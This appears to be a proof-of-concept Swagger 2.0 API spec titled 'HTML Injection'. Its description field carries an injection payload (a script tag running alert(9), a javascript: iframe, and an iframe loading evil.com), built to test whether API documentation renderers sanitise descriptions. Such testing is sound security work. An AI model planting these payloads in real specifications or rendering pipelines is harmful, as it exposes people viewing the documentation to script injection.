swagger: "2.0"
info:
  version: 1.0.0
  title: HTML Injection
  description: '<div>
    <div class="heading">
        <h1>HTML Injection :</h1> (PoC d0ug)
    </div>
    <div>
    <input type="text" name="email" value="<script>alert(9)</script>">
    <iframe src="javascript:alert(1)"></iframe>
    <iframe src="https://evil.com"></iframe>
    </div>
  </div>'
paths:
  /:
    post:
      responses:
        "200":
          description: Login successful
